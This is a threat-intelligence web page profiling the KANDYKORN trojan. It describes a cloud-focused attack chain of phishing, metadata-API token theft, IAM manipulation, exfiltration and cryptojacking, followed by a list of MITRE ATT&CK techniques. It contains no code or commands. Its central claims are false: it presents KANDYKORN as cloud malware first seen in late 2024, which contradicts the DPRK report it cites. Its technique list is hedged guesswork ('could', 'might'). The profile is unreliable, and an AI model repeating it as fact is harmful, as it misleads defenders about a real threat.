KANDYKORN (Trojan) – Malware

Overview

KANDYKORN is a sophisticated malware strain specifically engineered to exploit cloud-based environments and their associated infrastructure. First identified in the wild in late 2024, this malware represents a growing trend among cybercriminals who are shifting focus from traditional endpoints to the lucrative realm of cloud computing. Designed with a modular architecture, KANDYKORN adapts dynamically to its environment, targeting a wide array of cloud services and containerized systems.

The emergence of KANDYKORN underscores the increasing vulnerability of cloud platforms, which are often seen as resilient due to their layered security measures. However, KANDYKORN leverages misconfigurations, zero-day vulnerabilities, and social engineering techniques to bypass these defenses. The malware’s capabilities range from credential theft and lateral movement to resource hijacking for cryptomining. By doing so, it not only compromises the integrity of affected systems but also exploits their computational power for illicit financial gain.

Targets

Information

FInance and Insurance

How they operate

The infection begins with Initial Access, often achieved through phishing emails containing malicious attachments or links. These phishing campaigns are highly targeted, frequently using cloud-branded themes to deceive recipients into divulging credentials or running executable files. Once inside, KANDYKORN leverages stolen credentials to authenticate with cloud service APIs, enabling it to bypass standard multi-factor authentication in some cases by stealing session tokens from browser caches or instance metadata APIs.

Upon gaining access, the malware deploys its Execution and Persistence components. KANDYKORN utilizes scripts written in Python or PowerShell to manipulate cloud instances. These scripts establish communication with command-and-control (C2) servers, ensuring real-time adaptability. For persistence, KANDYKORN creates shadow administrator accounts or modifies IAM policies to grant itself privileged access. It also abuses cloud provider metadata APIs to retrieve tokens that enable long-term access without raising suspicion.

KANDYKORN’s Discovery mechanisms focus on enumerating cloud resources and configurations. By querying cloud service APIs, it identifies storage buckets, virtual machines, and sensitive data repositories. It maps the target environment meticulously, ensuring its payloads are tailored to maximize damage or stealth. For Privilege Escalation, the malware exploits misconfigured roles or known vulnerabilities in the cloud management platform, granting itself unrestricted control.

The malware’s Collection and Exfiltration processes are highly advanced. KANDYKORN scans for sensitive data, such as customer information or intellectual property, within cloud storage objects and databases. This data is compressed and encrypted before exfiltration, typically using cloud services such as object storage buckets controlled by the attacker. The use of legitimate cloud services for exfiltration makes detection and mitigation challenging.

KANDYKORN’s Defense Evasion capabilities are particularly noteworthy. It employs techniques such as obfuscation, encryption, and API abuse to avoid triggering security alarms. By mimicking legitimate user behavior and integrating into cloud service workflows, the malware evades detection by traditional security solutions. It also disables cloud security logging where possible, ensuring minimal traces of its activities are recorded.

Finally, KANDYKORN’s Impact phase focuses on resource hijacking and data manipulation. It may hijack cloud resources for cryptojacking, draining the victim’s computing capacity and increasing their operational costs. Alternatively, it can encrypt critical data, holding it ransom for payment. In severe cases, KANDYKORN has been observed executing destructive payloads, corrupting data repositories, and rendering services inoperable.

KANDYKORN’s technical sophistication underscores the need for robust cloud security measures. Organizations must adopt comprehensive monitoring, enforce strict access controls, and regularly audit their cloud configurations to mitigate the risk posed by this advanced malware.

MITRE Tactics and Techniques

1. Initial Access

Phishing (T1566): KANDYKORN could use phishing emails to deliver payloads or steal credentials for cloud accounts.

Valid Accounts (T1078): The malware might exploit stolen or weak credentials to gain access to cloud environments.

2. Execution

Command and Scripting Interpreter (T1059): It may leverage scripting languages like PowerShell or Python to execute malicious commands in the cloud.

Native API (T1106): Exploiting legitimate APIs for execution within cloud systems.

3. Persistence

Account Manipulation (T1098): Creating or modifying user accounts within cloud environments for long-term access.

Cloud Instance Metadata API (T1552.005): Abusing cloud instance metadata services to retrieve tokens or credentials.

4. Privilege Escalation

Exploitation for Privilege Escalation (T1068): Exploiting misconfigurations or vulnerabilities to elevate privileges.

Cloud Service Dashboard (T1538): Manipulating permissions or roles via cloud dashboards.

5. Defense Evasion

Obfuscated Files or Information (T1027): Encrypting or compressing files to evade detection.

Abuse Elevation Control Mechanism (T1548): Exploiting features like sudo or API privileges for evasion.

6. Credential Access

Unsecured Credentials (T1552): Harvesting credentials from misconfigured storage or repositories.

Credential Dumping (T1003): Dumping credentials from memory or storage in cloud systems.

7. Discovery

Cloud Service Discovery (T1526): Enumerating cloud accounts, services, and configurations.

System Information Discovery (T1082): Collecting details about the underlying system to tailor attacks.

8. Lateral Movement

Exploitation of Remote Services (T1210): Exploiting remote access protocols within the cloud environment.

Internal Spear Phishing (T1534): Using compromised accounts to spread laterally within the organization.

9. Collection

Data from Cloud Storage Object (T1530): Extracting data from cloud storage.

Screen Capture (T1113): Capturing screen content from compromised cloud environments.

10. Exfiltration

Exfiltration Over Web Service (T1567.002): Using cloud services to exfiltrate data.

Transfer Data to Cloud Account (T1537): Transferring stolen data to attacker-controlled cloud accounts.

11. Impact

Resource Hijacking (T1496): Exploiting cloud resources for cryptomining or other purposes.

Data Manipulation (T1565): Altering or encrypting cloud-hosted data for ransom or sabotage.

References:

• Elastic catches DPRK passing out KANDYKORN